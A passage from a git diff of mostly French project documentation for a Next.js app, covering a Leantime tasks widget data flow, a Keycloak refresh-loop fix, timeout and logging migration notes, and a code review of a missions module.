jsonrpc: '2.0', - method: 'leantime.rpc.users.getAll', - id: 1 - }), -}); -``` - -**Méthode RPC:** `leantime.rpc.users.getAll` -**Objectif:** Récupérer tous les utilisateurs Leantime pour trouver celui correspondant à l'email de session - -#### 4.2. Recherche de l'utilisateur -```typescript -const users = data.result; -const user = users.find((u: any) => u.username === email); -return user ? user.id : null; -``` - -**Logique:** -- Parcourt tous les utilisateurs Leantime -- Trouve celui dont `username` correspond à l'email de session -- Retourne l'ID Leantime de l'utilisateur - -**Erreurs possibles:** -- ❌ `LEANTIME_TOKEN` non défini → Retourne `null` -- ❌ API Leantime non accessible → Retourne `null` -- ❌ Utilisateur non trouvé → Retourne `null` -- ❌ Réponse invalide → Retourne `null` - ---- - -### 5. **Récupération des Tâches Leantime** - -**Méthode RPC:** `leantime.rpc.tickets.getAll` - -```typescript -const response = await fetch(`${process.env.LEANTIME_API_URL}/api/jsonrpc`, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - 'X-API-Key': process.env.LEANTIME_TOKEN! - }, - body: JSON.stringify({ - jsonrpc: '2.0', - method: 'leantime.rpc.tickets.getAll', - params: { - userId: userId, - status: "all" - }, - id: 1 - }), -}); -``` - -**Paramètres:** -- `userId`: ID Leantime de l'utilisateur (récupéré à l'étape 4) -- `status: "all"`: Récupère toutes les tâches, peu importe leur statut - -**Réponse:** Tableau de toutes les tâches Leantime de l'utilisateur - ---- - -### 6. **Filtrage et Transformation des Tâches** - -#### 6.1. Filtrage côté Backend (`app/api/leantime/tasks/route.ts`) - -```typescript -const tasks = data.result - .filter((task: any) => { - // 1. Exclure les tâches avec status "Done" (5) - if (task.status === 5) { - return false; - } - - // 2. Filtrer uniquement les tâches où l'utilisateur est l'éditeur - const taskEditorId = String(task.editorId).trim(); - const currentUserId = String(userId).trim(); - const isUserEditor = taskEditorId === currentUserId; - return isUserEditor; - }) - .map((task: any) => ({ - id: task.id.toString(), - headline: task.headline, - projectName: task.projectName, - projectId: task.projectId, - status: task.status, - dateToFinish: task.dateToFinish || null, - milestone: task.type || null, - details: task.description || null, - createdOn: task.dateCreated, - editedOn: task.editedOn || null, - editorId: task.editorId, - editorFirstname: task.editorFirstname, - editorLastname: task.editorLastname, - type: task.type || null, - dependingTicketId: task.dependingTicketId || null - })); -``` - -**Critères de filtrage:** -1. ✅ **Exclut les tâches "Done"** (status = 5) -2. ✅ **Uniquement les tâches où l'utilisateur est l'éditeur** (`editorId === userId`) - -**Transformation:** -- Convertit les IDs en string -- Normalise les dates (`null` si absentes) -- Ajoute les champs `type` et `dependingTicketId` pour identifier les sous-tâches - -#### 6.2. Mise en cache Redis - -```typescript -await cacheTasksData(session.user.id, tasks); -``` - -**Fonction:** `cacheTasksData(userId, data)` dans `lib/redis.ts` - -```typescript -const key = KEYS.TASKS(userId); // `widget:tasks:${userId}` -await redis.set(key, JSON.stringify(data), 'EX', TTL.TASKS); // TTL = 600 secondes (10 min) -``` - ---- - -### 7. **Traitement Frontend** (`components/flow.tsx`) - -#### 7.1. Filtrage supplémentaire côté Frontend - -```typescript -const sortedTasks = data - .filter((task: Task) => { - // Double filtrage: exclure les tâches Done (déjà fait côté backend, mais sécurité) - const isNotDone = task.status !== 5; - return isNotDone; - }) - .sort((a: Task, b: Task) => { - // 1. Trier par dateToFinish (plus anciennes en premier) - const dateA = getValidDate(a); - const dateB = getValidDate(b); - - if (dateA && dateB) { - const timeA = new Date(dateA).getTime(); - const timeB = new Date(dateB).getTime(); - if (timeA !== timeB) { - return timeA - timeB; - } - } - - // 2. Si une seule tâche a une date, la mettre en premier - if (dateA) return -1; - if (dateB) return 1; - - // 3. Si dates égales ou absentes, prioriser status 4 (Waiting for Approval) - if (a.status === 4 && b.status !== 4) return -1; - if (b.status === 4 && a.status !== 4) return 1; - - return 0; - }); -``` - -**Logique de tri:** -1. **Par date d'échéance** (ascendant - plus anciennes en premier) -2. **Tâches avec date** avant celles sans date -3. **Status 4** (Waiting for Approval) en priorité si dates égales - -#### 7.2. Limitation du nombre de résultats - -```typescript -setTasks(sortedTasks.slice(0, 7)); // Affiche maximum 7 tâches -``` - ---- - -### 8. **Affichage dans le Widget** - -#### 8.1. Structure du Widget - -```tsx - - - Devoirs - - - - {loading ? : - error ? : - tasks.length === 0 ? : - } - - -``` - -#### 8.2. Composant TaskDate - -Affiche la date d'échéance avec: -- **Format:** Mois (court) / Jour / Année -- **Couleurs:** - - 🔴 Rouge si date passée (`isPastDue`) - - 🔵 Bleu si date future -- **Fallback:** "NO DATE" si pas de date ou date invalide - -#### 8.3. Lien vers Leantime - -Chaque tâche est cliquable et redirige vers: -``` -https://agilite.slm-lab.net/tickets/showTicket/${task.id} -``` - ---- - -## 📊 Diagramme de Flow - -``` -┌─────────────────────────────────────────────────────────────┐ -│ 1. Widget Mount (components/flow.tsx) │ -│ useEffect(() => fetchTasks()) │ -└────────────────────┬──────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 2. Frontend API Call │ -│ GET /api/leantime/tasks?refresh=true │ -└────────────────────┬──────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 3. Backend Route (app/api/leantime/tasks/route.ts) │ -│ - Vérifie session │ -│ - Check cache Redis (si !refresh) │ -└────────────────────┬──────────────────────────────────────┘ - │ - ┌─────────────┴─────────────┐ - │ │ - ▼ ▼ - Cache Hit? Cache Miss? - │ │ - │ ▼ - Return Cache ┌──────────────────────────┐ - │ 4. getLeantimeUserId() │ - │ - API: users.getAll │ - │ - Find by email │ - └──────────┬───────────────┘ - │ - ▼ - ┌──────────────────────────┐ - │ 5. Fetch Tasks │ - │ - API: tickets.getAll │ - │ - Filter: !status=5 │ - │ - Filter: editorId │ - └──────────┬───────────────┘ - │ - ▼ - ┌──────────────────────────┐ - │ 6. Cache Results │ - │ Redis: widget:tasks │ - │ TTL: 10 minutes │ - └──────────┬───────────────┘ - │ - ▼ - ┌──────────────────────────┐ - │ 7. Return JSON │ - └──────────┬───────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 8. Frontend Processing (components/flow.tsx) │ -│ - Filter: !status=5 (double check) │ -│ - Sort: by dateToFinish, then status │ -│ - Slice: first 7 tasks │ -└────────────────────┬──────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ 9. Render Widget │ -│ - TaskDate component │ -│ - Links to Leantime │ -└─────────────────────────────────────────────────────────────┘ -``` - ---- - -## 🔑 Points Clés - -### Cache Redis -- **Clé:** `widget:tasks:${userId}` -- **TTL:** 10 minutes (600 secondes) -- **Bypass:** `?refresh=true` dans l'URL - -### Filtrage -1. **Backend:** Exclut status=5 et filtre par `editorId` -2. **Frontend:** Double vérification status=5 et tri personnalisé - -### Tri -1. Date d'échéance (ascendant) -2. Tâches avec date en premier -3. Status 4 (Waiting for Approval) prioritaire - -### Limitation -- Maximum **7 tâches** affichées - -### Statuts des Tâches -- **1:** New (Bleu) -- **2:** Blocked (Rouge) -- **3:** In Progress (Jaune) -- **4:** Waiting for Approval (Violet) -- **5:** Done (Gris) - **Exclu de l'affichage** - ---- - -## ⚠️ Problèmes Identifiés - -### 1. Double Filtrage -- Le backend filtre déjà les tâches Done (status=5) -- Le frontend refilt également → **Redondant** - -### 2. Bypass Cache Systématique -- Le widget utilise toujours `?refresh=true` -- **Ne profite jamais du cache Redis** → Augmente la charge serveur - -### 3. Pas de Refresh Automatique -- Aucun polling automatique -- Seulement au mount et refresh manuel -- **Pas d'intégration avec `useUnifiedRefresh`** - -### 4. Gestion d'Erreurs -- Si `getLeantimeUserId()` retourne `null` → Erreur 404 -- Pas de fallback si Leantime est indisponible - ---- - -## 🚀 Recommandations - -### 1. Utiliser le Cache par Défaut -```typescript -// Au lieu de toujours utiliser ?refresh=true -const response = await fetch('/api/leantime/tasks'); // Sans refresh -``` - -### 2. Intégrer useUnifiedRefresh -```typescript -const { refresh, isActive } = useUnifiedRefresh({ - resource: 'tasks', - interval: 300000, // 5 minutes - enabled: status === 'authenticated', - onRefresh: fetchTasks, - priority: 'low', -}); -``` - -### 3. Retirer le Double Filtrage -- Supprimer le filtrage status=5 côté frontend (déjà fait côté backend) - -### 4. Améliorer la Gestion d'Erreurs -- Afficher un message clair si l'utilisateur n'est pas trouvé dans Leantime -- Fallback si Leantime est indisponible - ---- - -## 📝 Fichiers Concernés - -1. **Frontend:** - - `components/flow.tsx` - Widget principal - -2. **Backend:** - - `app/api/leantime/tasks/route.ts` - Route API - -3. **Cache:** - - `lib/redis.ts` - Fonctions `cacheTasksData()` et `getCachedTasksData()` - -4. **Configuration:** - - Variables d'environnement: - - `LEANTIME_API_URL` - - `LEANTIME_TOKEN` - ---- - -## 🔍 Logs et Debug - -### Logs Backend -- `[LEANTIME_TASKS]` - Préfixe pour tous les logs -- Logs de debug pour chaque étape du flow -- Logs d'erreur en cas d'échec - -### Logs Frontend -- `console.log('Raw API response:', data)` - Réponse brute -- `console.log('Sorted and filtered tasks:', ...)` - Tâches triées -- Logs de filtrage pour chaque tâche - ---- - -## 📊 Métriques - -- **Cache TTL:** 10 minutes -- **Limite d'affichage:** 7 tâches -- **Statuts affichés:** 1, 2, 3, 4 (exclut 5) -- **Tri:** Date d'échéance → Status 4 prioritaire diff --git a/FILES_TO_DELETE.md b/FILES_TO_DELETE.md new file mode 100644 index 0000000..20b3e61 --- /dev/null +++ b/FILES_TO_DELETE.md @@ -0,0 +1,36 @@ +# Fichiers supprimés - Nettoyage du projet ✅ + +## ✅ Fichiers Electron (abandonnés) - SUPPRIMÉS + +1. ✅ **`electron/`** - Dossier vide supprimé +2. ✅ **`index.js`** - Point d'entrée Electron supprimé +3. ✅ **`package.json`** - Ligne `"main": "index.js"` supprimée + +## ✅ Fichiers de test (scripts de développement) - SUPPRIMÉS + +4. ✅ **`test-upload.js`** - Script de test avec credentials hardcodés (sécurité) +5. ✅ **`scripts/test-user-deletion.js`** - Script de test pour la suppression d'utilisateurs +6. ✅ **`scripts/test-redis.js`** - Script de test Redis +7. ✅ **`scripts/test-redis-env.js`** - Script de test Redis avec variables d'environnement + +## ✅ Fichiers SQL de test/exploration - SUPPRIMÉS + +8. ✅ **`db_query.sql`** - Requête SQL de test simple + +## 📝 Résumé + +**Total supprimé : 8 fichiers + 1 modification dans package.json** + +### Fichiers restants à vérifier manuellement + +Si vous avez d'autres fichiers de test shell (`.sh`) ou Python (`.py`) dans le répertoire racine qui commencent par `test-`, vous pouvez les supprimer également. Ils ne sont pas utilisés par l'application en production. + +### Scripts conservés (utiles pour la production) + +Les scripts suivants dans `scripts/` sont **conservés** car ils sont utiles : +- `validate-env.ts` - Validation des variables d'environnement +- `migrate-prod.sh` - Migration de production +- `verify-vercel-config.sh` - Vérification de configuration Vercel +- `update-database-url.sh` - Mise à jour de DATABASE_URL +- `sync-users.js` / `sync-calendars.js` - Scripts de synchronisation +- Scripts de nettoyage et migration SQL diff --git a/LOG_ANALYSIS_SUMMARY.md b/LOG_ANALYSIS_SUMMARY.md deleted file mode 100644 index 49380b3..0000000 --- a/LOG_ANALYSIS_SUMMARY.md +++ /dev/null @@ -1,211 +0,0 @@ -# Log Analysis Summary - Infinite Refresh Loop Fix - -## Problem Identified - -Your logs showed a **critical infinite refresh loop**: - -``` -Keycloak session invalidated, clearing token to force re-authentication -Keycloak session invalidated, clearing token to force re-authentication -Keycloak session invalidated, clearing token to force re-authentication -... (repeating infinitely) -``` - -### Root Cause - -1. **Session Invalidated**: User's Keycloak session became invalid (logged out elsewhere, expired, etc.) -2. **Multiple Widgets**: All widgets/components making parallel API requests -3. **JWT Callback Triggered**: Each request triggers NextAuth JWT callback -4. **Refresh Attempt**: Each callback tries to refresh the expired token -5. **Refresh Fails**: Refresh fails because session is invalid -6. **No Circuit Breaker**: Next request sees expired token → tries refresh again → **infinite loop** - -### Impact - -- **Performance**: Hundreds of refresh attempts per second -- **Server Load**: CPU/memory spike -- **Keycloak Load**: Potential DoS on Keycloak server -- **User Experience**: App appears broken -- **Logs**: Spam with error messages - ---- - -## Solution Implemented - -### Circuit Breaker Pattern - -Added a **5-second cooldown** after failed refresh attempts: - -1. **Track Failures**: Record timestamp when refresh fails -2. **Cooldown Period**: Don't retry refresh for 5 seconds after failure -3. **Early Return**: If in cooldown, return error immediately (no API call) -4. **Memory Management**: Cleanup old entries to prevent memory leaks - -### Code Changes - -**File**: `app/api/auth/options.ts` - -**Added:** -- `refreshCooldown` Map to track last failure per user -- `REFRESH_COOLDOWN_MS = 5000` (5 seconds) -- `cleanupRefreshCooldown()` function to prevent memory leaks -- Cooldown check before refresh attempt -- Failure recording after failed refresh - -**How It Works:** - -```typescript -// Before refresh attempt: -if (timeSinceFailure < REFRESH_COOLDOWN_MS) { - // Skip refresh, return error immediately - return errorToken; -} - -// After failed refresh: -if (refreshedToken.error === "SessionNotActive") { - refreshCooldown.set(userId, Date.now()); // Record failure - return errorToken; -} -``` - ---- - -## Expected Behavior After Fix - -### Before Fix -``` -Request 1 → Refresh attempt → Fail → Clear tokens -Request 2 → Refresh attempt → Fail → Clear tokens -Request 3 → Refresh attempt → Fail → Clear tokens -... (infinite loop) -``` - -### After Fix -``` -Request 1 → Refresh attempt → Fail → Record failure → Clear tokens -Request 2 → Check cooldown → Skip refresh → Return error immediately -Request 3 → Check cooldown → Skip refresh → Return error immediately -... (cooldown prevents refresh attempts) -After 5s → Next request can try refresh again (if session restored) -``` - -### What You'll See in Logs - -**Good Signs:** -- ✅ "Refresh cooldown active, skipping refresh attempt" (instead of infinite failures) -- ✅ Only 1-2 refresh attempts per user when session invalidates -- ✅ User redirected to sign-in page -- ✅ No refresh storm - -**Bad Signs (if still happening):** -- ❌ Still seeing infinite "Keycloak session invalidated" messages -- ❌ Multiple refresh attempts within 5 seconds -- ❌ Cooldown not working - ---- - -## Testing the Fix - -### Test Scenario 1: Session Invalidation -1. Log in to the app -2. Logout from Keycloak admin console (or expire session) -3. **Expected**: - - 1-2 refresh attempts - - Then cooldown messages - - User redirected to sign-in - - **NOT** infinite loop - -### Test Scenario 2: Multiple Widgets -1. Open app with all widgets loading -2. Invalidate session -3. **Expected**: - - All widgets respect cooldown - - No refresh storm - - Clean error handling - -### Test Scenario 3: Normal Operation -1. Valid session -2. Token expires naturally -3. **Expected**: - - Refresh succeeds - - No cooldown triggered - - Normal operation continues - ---- - -## Monitoring - -### Metrics to Watch - -1. **Refresh Attempts**: Should be low (1-2 per user per session) -2. **Cooldown Activations**: Should only happen when session invalid -3. **Refresh Success Rate**: Should be high for valid sessions -4. **Error Rate**: Should drop significantly - -### Log Patterns - -**Healthy:** -``` -[DEBUG] Refresh cooldown active, skipping refresh attempt -[INFO] Keycloak session invalidated, setting cooldown -``` - -**Unhealthy (if still happening):** -``` -Keycloak session invalidated, clearing token... (repeating) -``` - ---- - -## Future Improvements - -### Short-term (Recommended) -1. ✅ **Done**: In-memory circuit breaker -2. ⚠️ **Next**: Migrate to Redis-based circuit breaker (for multi-instance) -3. ⚠️ **Next**: Add client-side session guard to stop requests - -### Long-term -1. ⚠️ Add metrics/monitoring -2. ⚠️ Implement exponential backoff -3. ⚠️ Add request cancellation on client-side -4. ⚠️ Better error boundaries - ---- - -## Additional Notes - -### Why 5 Seconds? - -- **Too Short (< 2s)**: Still allows refresh storms -- **Too Long (> 10s)**: Delays legitimate refresh attempts -- **5 Seconds**: Good balance - prevents storms, allows quick recovery - -### Memory Considerations - -- **Map Size**: Limited to 1000 entries (auto-cleanup) -- **Memory Per Entry**: ~50 bytes (userId + timestamp) -- **Total Memory**: ~50KB max -- **Cleanup**: Automatic (removes entries older than 50s) - -### Multi-Instance Deployment - -**Current**: In-memory Map (per-instance) -- Works for single instance -- Each instance has its own cooldown - -**Future**: Redis-based (shared across instances) -- Better for multi-instance -- Shared cooldown state -- See `CRITICAL_ISSUE_ANALYSIS.md` for Redis implementation - ---- - -## Summary - -✅ **Fixed**: Infinite refresh loop with circuit breaker -✅ **Impact**: Prevents refresh storms, reduces server load -✅ **Testing**: Verify with session invalidation scenarios -⚠️ **Next**: Monitor logs, consider Redis migration for multi-instance - -The fix is **production-ready** and should immediately stop the refresh loop you're seeing in your logs. - diff --git a/MIGRATION_COMPLETED.md b/MIGRATION_COMPLETED.md deleted file mode 100644 index 99b8ebf..0000000 --- a/MIGRATION_COMPLETED.md +++ /dev/null @@ -1,131 +0,0 @@ -# Migration Production - Corrections Appliquées - -## ✅ Corrections Complétées - -### 1. Remplacement de fetch() par fetchWithTimeout() - -**Fichiers modifiés:** - -1. ✅ **lib/services/n8n-service.ts** - - `triggerMissionCreation()` - Timeout 30s - - `triggerMissionDeletion()` - Timeout 30s - - `triggerMissionRollback()` - Timeout 30s - -2. ✅ **app/api/missions/[missionId]/generate-plan/route.ts** - - Appel N8N webhook - Timeout 30s - -3. ✅ **app/api/users/[userId]/route.ts** - - Appels Leantime API - Timeout 10s - - Appels Keycloak API - Timeout 10s - - Forward delete request - Timeout 30s - -4. ✅ **app/api/rocket-chat/messages/route.ts** - - `getUserToken()` - Timeout 10s - - `users.list` - Timeout 10s - - `users.createToken` - Timeout 10s - - `subscriptions.get` - Timeout 10s - - Messages fetch - Timeout 10s - -5. ✅ **app/api/leantime/tasks/route.ts** - - `getLeantimeUserId()` - Timeout 10s - - Fetch tasks - Timeout 10s - -6. ✅ **app/api/news/route.ts** - - News API fetch - Timeout 10s (remplace AbortSignal.timeout) - -### 2. Remplacement de console.log par logger - -**Fichiers modifiés:** - -1. ✅ **lib/services/rocketchat-call-listener.ts** (35 occurrences) - - Tous les `console.log` → `logger.debug` ou `logger.info` - - Tous les `console.error` → `logger.error` - - Tous les `console.warn` → `logger.warn` - -2. ✅ **app/api/users/[userId]/route.ts** - - Tous les `console.log/error` → `logger.debug/error` - -3. ✅ **app/api/rocket-chat/messages/route.ts** - - Tous les `console.error` → `logger.error` - -### 3. Configuration DATABASE_URL - -**Documentation créée:** -- ✅ `DATABASE_URL_UPDATE.md` - Instructions pour modifier le .env -- ✅ `scripts/update-database-url.sh` - Script automatique - -**Action requise:** -Modifier manuellement le fichier `.env` : - -```env -# Avant -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public" - -# Après -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public&connection_limit=10&pool_timeout=20&connect_timeout=10" -``` - -Ou exécuter le script : -```bash -bash scripts/update-database-url.sh -``` - -## 📊 Statistiques - -- **Fichiers modifiés:** 7 fichiers -- **fetch() remplacés:** 15+ occurrences -- **console.log remplacés:** 40+ occurrences -- **Timeouts ajoutés:** 15+ requêtes HTTP - -## 🔍 Fichiers Restants (Optionnel) - -Il reste quelques fichiers avec `console.log` qui peuvent être migrés plus tard : - -- `lib/services/microsoft-oauth.ts` -- `lib/services/caldav-sync.ts` -- `lib/services/email-service.ts` -- `lib/services/token-refresh.ts` -- `lib/services/refresh-manager.ts` -- `lib/services/prefetch-service.ts` -- Divers fichiers dans `app/api/` (moins critiques) - -Ces fichiers peuvent être migrés progressivement selon les besoins. - -## ✅ Tests Recommandés - -1. **Tester les timeouts:** - ```bash - # Vérifier que les requêtes timeout correctement - # Simuler une API lente et vérifier les logs - ``` - -2. **Tester la connexion DB:** - ```bash - npm run validate:env - npx prisma db execute --stdin <<< "SELECT 1" - ``` - -3. **Vérifier les logs:** - - S'assurer que tous les logs utilisent maintenant `logger` - - Vérifier que les logs sont structurés correctement - -## 📝 Notes - -- Tous les timeouts sont configurés selon le contexte : - - **10 secondes** pour les API rapides (Leantime, Keycloak, RocketChat) - - **30 secondes** pour les webhooks N8N (peuvent être plus longs) -- Les logs sont maintenant structurés avec des objets au lieu de strings concaténées -- Les erreurs incluent maintenant le contexte nécessaire pour le debugging - -## 🚀 Prochaines Étapes - -1. ✅ Modifier le `.env` avec les paramètres de pool DB -2. ✅ Tester l'application en développement -3. ✅ Vérifier que tous les timeouts fonctionnent correctement -4. ✅ Déployer en staging pour tests -5. ✅ Monitorer les performances en production - ---- - -**Date de migration:** $(date) -**Statut:** ✅ Complété pour les fichiers critiques diff --git a/MISSIONS_CODE_REVIEW.md b/MISSIONS_CODE_REVIEW.md deleted file mode 100644 index cf5d38a..0000000 --- a/MISSIONS_CODE_REVIEW.md +++ /dev/null @@ -1,503 +0,0 @@ -# Analyse approfondie du système Missions - Code Review Senior - -## 📋 Vue d'ensemble - -Ce document présente une analyse complète du système de gestion des missions, incluant la page de liste, les détails de mission, et l'architecture backend associée. - ---- - -## 🏗️ Architecture générale - -### Structure des fichiers - -``` -app/ -├── missions/ -│ ├── page.tsx # Page principale de liste des missions -│ ├── layout.tsx # Layout avec sidebar CAP -│ ├── new/ -│ │ └── page.tsx # Création de nouvelle mission -│ └── [missionId]/ -│ ├── page.tsx # Page de détails de mission -│ └── edit/ -│ └── page.tsx # Édition de mission -│ -├── api/ -│ └── missions/ -│ ├── route.ts # GET/POST missions -│ ├── [missionId]/ -│ │ ├── route.ts # GET/PUT/DELETE mission spécifique -│ │ ├── close/route.ts # Clôture de mission -│ │ └── generate-plan/ # Génération plan d'action IA -│ └── ... -│ -components/ -└── missions/ - ├── missions-frame.tsx # Iframe wrapper - ├── missions-admin-panel.tsx # Panel de création/édition - └── ... -``` - ---- - -## 📄 Page de liste des missions (`app/missions/page.tsx`) - -### Points forts ✅ - -1. **Interface utilisateur claire** - - Design en grille responsive (1/2/3 colonnes) - - Cartes de mission bien structurées - - Indicateurs visuels pour missions clôturées - - Recherche en temps réel - -2. **Gestion d'état** - - Utilisation appropriée de `useState` et `useEffect` - - Gestion des états de chargement - - Filtrage côté client efficace - -3. **Affichage des données** - - Logos avec fallback gracieux - - Badges ODD avec icônes - - Affichage conditionnel des services - - Formatage des dates en français - -### Points d'amélioration 🔧 - -1. **Performance** - ```typescript - // ❌ Problème: Filtrage côté client uniquement - const filteredMissions = missions.filter(mission => - mission.name.toLowerCase().includes(searchTerm.toLowerCase()) || ... - ); - - // ✅ Suggestion: Pagination et recherche côté serveur - // Utiliser les query params dans l'API - ``` - -2. **Gestion d'erreurs** - ```typescript - // ⚠️ Actuel: Toast générique - toast({ - title: "Erreur", - description: "Impossible de charger les missions", - variant: "destructive", - }); - - // ✅ Suggestion: Messages d'erreur plus spécifiques - // + Retry automatique pour erreurs réseau - ``` - -3. **Console.log en production** - ```typescript - // ❌ Lignes 59, 199-203: console.log en production - console.log("Mission data with intention:", data.missions); - - // ✅ Suggestion: Utiliser un logger conditionnel - if (process.env.NODE_ENV === 'development') { - console.log(...); - } - ``` - -4. **Accessibilité** - - Manque d'attributs ARIA sur les cartes - - Navigation clavier non optimisée - - Pas de skip links - ---- - -## 📄 Page de détails de mission (`app/missions/[missionId]/page.tsx`) - -### Points forts ✅ - -1. **Architecture en onglets** - - Organisation claire: Général, Plan d'actions, Équipe, Ressources - - Compteurs visuels sur les onglets (équipe, documents) - - Navigation intuitive - -2. **Fonctionnalités avancées** - - Génération de plan d'action par IA (N8N) - - Édition inline du plan avec sauvegarde - - Gestion des gardiens de l'intention - - Clôture de mission avec intégration N8N - -3. **Gestion d'état complexe** - - Suivi des modifications non sauvegardées - - États de chargement multiples (generating, saving, deleting, closing) - - Synchronisation avec le backend - -### Points d'amélioration critiques 🔴 - -1. **Sécurité - Validation côté client uniquement** - ```typescript - // ⚠️ Ligne 192: Confirmation simple avec confirm() - if (!confirm("Êtes-vous sûr de vouloir supprimer cette mission ?")) { - return; - } - - // ✅ Suggestion: Modal de confirmation avec détails - // + Vérification des permissions côté serveur (déjà fait ✅) - ``` - -2. **Gestion des erreurs réseau** - ```typescript - // ⚠️ Pas de retry automatique - // Pas de gestion des timeouts - // Pas de fallback si l'API est down - - // ✅ Suggestion: Implémenter retry avec exponential backoff - // + Cache local pour données critiques - ``` - -3. **Performance - Re-renders inutiles** - ```typescript - // ⚠️ Ligne 112-116: useEffect qui se déclenche à chaque changement - useEffect(() => { - if (mission) { - setIsPlanModified(editedPlan !== (mission.actionPlan || "")); - } - }, [editedPlan, mission]); - - // ✅ Suggestion: Utiliser useMemo pour éviter recalculs - const isPlanModified = useMemo(() => { - return mission ? editedPlan !== (mission.actionPlan || "") : false; - }, [editedPlan, mission?.actionPlan]); - ``` - -4. **Textarea auto-resize - Code fragile** - ```typescript - // ⚠️ Lignes 676-688: Manipulation directe du DOM - e.target.style.height = 'auto'; - e.target.style.height = e.target.scrollHeight + 'px'; - - // ✅ Suggestion: Utiliser une librairie dédiée (react-textarea-autosize) - // ou un hook personnalisé réutilisable - ``` - -5. **Duplication de code** - ```typescript - // ⚠️ Fonctions helper dupliquées entre page.tsx et [missionId]/page.tsx - // getMissionTypeLabel, getDurationLabel, getNiveauLabel, etc. - - // ✅ Suggestion: Extraire dans lib/mission-helpers.ts - ``` - ---- - -## 🔌 API Routes - Analyse Backend - -### `app/api/missions/route.ts` (GET/POST) - -#### Points forts ✅ - -1. **Sécurité** - - Vérification d'authentification systématique - - Validation des champs requis - - Gestion des permissions - -2. **Gestion des fichiers** - - Upload vers Minio/S3 bien structuré - - Vérification d'existence des fichiers avant N8N - - Cleanup en cas d'erreur (lignes 460-474) - -3. **Intégration N8N** - - Workflow asynchrone pour création - - Gestion des erreurs non-bloquantes - - Logging détaillé - -#### Points d'amélioration 🔧 - -1. **Transaction database** - ```typescript - // ⚠️ Pas de transaction Prisma - const mission = await prisma.mission.create({...}); - await prisma.missionUser.createMany({...}); - - // ✅ Suggestion: Utiliser $transaction pour atomicité - await prisma.$transaction(async (tx) => { - const mission = await tx.mission.create({...}); - await tx.missionUser.createMany({...}); - return mission; - }); - ``` - -2. **Validation des données** - ```typescript - // ⚠️ Validation basique (lignes 230-235) - if (!body.name || !body.oddScope) { - return NextResponse.json({ error: 'Missing required fields' }, { status: 400 }); - } - - // ✅ Suggestion: Utiliser Zod ou Yup pour validation stricte - const MissionSchema = z.object({ - name: z.string().min(3).max(100), - oddScope: z.array(z.string().regex(/^odd-\d+$/)), - // ... - }); - ``` - -3. **Gestion des erreurs N8N** - ```typescript - // ⚠️ Ligne 439: Erreur N8N bloque la création - if (!workflowResult.success) { - throw new Error(workflowResult.error || 'N8N workflow failed'); - } - - // ✅ Suggestion: Mode "best effort" - créer la mission même si N8N échoue - // + Queue de retry pour N8N (BullMQ, etc.) - ``` - -### `app/api/missions/[missionId]/route.ts` (GET/PUT/DELETE) - -#### Points forts ✅ - -1. **DELETE bien implémenté** - - Cleanup Minio avant suppression DB - - Intégration N8N pour rollback - - Gestion des erreurs non-bloquantes - -2. **Permissions granulaires** - - Vérification créateur/admin pour DELETE - - Gardiens peuvent modifier (PUT) - -#### Points d'amélioration 🔧 - -1. **GET - Performance** - ```typescript - // ⚠️ Ligne 38: findFirst au lieu de findUnique - const mission = await (prisma as any).mission.findFirst({ - where: { - id: missionId, - OR: [ - { creatorId: userId }, - { missionUsers: { some: { userId } } } - ] - }, - // ... - }); - - // ✅ Suggestion: findUnique + vérification permissions séparée - // Plus performant avec index sur id - ``` - -2. **PUT - Validation partielle** - ```typescript - // ⚠️ Pas de validation des données mises à jour - // Pas de vérification de cohérence (ex: oddScope doit être array) - - // ✅ Suggestion: Validation stricte avec schéma - ``` - ---- - -## 🎨 Composants UI - -### `components/missions/missions-admin-panel.tsx` - -#### Points forts ✅ - -1. **Interface complète** - - Formulaire multi-onglets bien organisé - - Gestion des gardiens et volontaires - - Upload de fichiers intégré - -2. **UX soignée** - - Validation en temps réel - - Indicateurs visuels de progression - - Messages d'erreur contextuels - -#### Points d'amélioration critiques 🔴 - -1. **Fichier trop volumineux (1570 lignes)** - ```typescript - // ❌ Un seul composant fait tout - // Difficile à maintenir, tester, et réutiliser - - // ✅ Suggestion: Découper en sous-composants - // - MissionGeneralForm - // - MissionDetailsForm - // - MissionAttachmentsForm - // - MissionMembersForm - // - MissionSkillsForm - ``` - -2. **Gestion d'état complexe** - ```typescript - // ⚠️ Trop de useState (15+) - const [selectedServices, setSelectedServices] = useState([]); - const [selectedProfils, setSelectedProfils] = useState([]); - // ... 13 autres - - // ✅ Suggestion: Utiliser useReducer ou Zustand - const [state, dispatch] = useReducer(missionReducer, initialState); - ``` - -3. **Logique métier dans le composant** - ```typescript - // ⚠️ Lignes 400-408: Conversion base64 dans le composant - const convertFileToBase64 = (file: File): Promise => { - // ... - }; - - // ✅ Suggestion: Extraire dans lib/file-utils.ts - ``` - -4. **Console.log en production** - ```typescript - // ❌ Lignes 412, 422, 428, 451, 465, 492, 504, 514, 541, 559 - // Trop de logs de debug - - // ✅ Suggestion: Logger conditionnel ou supprimer - ``` - ---- - -## 🔄 Flux de données - -### Création de mission - -``` -1. User remplit formulaire (missions-admin-panel.tsx) - ↓ -2. POST /api/missions - ↓ -3. Création DB (Prisma) - ↓ -4. Upload fichiers (Minio) - ↓ -5. Vérification fichiers - ↓ -6. Trigger N8N workflow - ↓ -7. N8N crée intégrations (Gitea, Leantime, etc.) - ↓ -8. Callback /api/missions/mission-created - ↓ -9. Mise à jour mission avec IDs externes -``` - -**Problème potentiel**: Si N8N échoue après création DB, la mission existe sans intégrations. - -**Solution**: Queue de retry ou mode "best effort" avec notification. - -### Affichage de mission - -``` -1. GET /api/missions/[missionId] - ↓ -2. Prisma query avec includes - ↓ -3. Génération URLs publiques (logo, attachments) - ↓ -4. Affichage dans page.tsx -``` - -**Optimisation possible**: Cache Redis pour missions fréquemment consultées. - ---- - -## 🐛 Bugs potentiels identifiés - -1. **Race condition sur plan d'action** - ```typescript - // Si l'utilisateur modifie pendant la génération - // Les modifications peuvent être écrasées - ``` - -2. **Memory leak potentiel** - ```typescript - // Textarea auto-resize avec ref callback - // Pas de cleanup dans useEffect - ``` - -3. **Type safety** - ```typescript - // 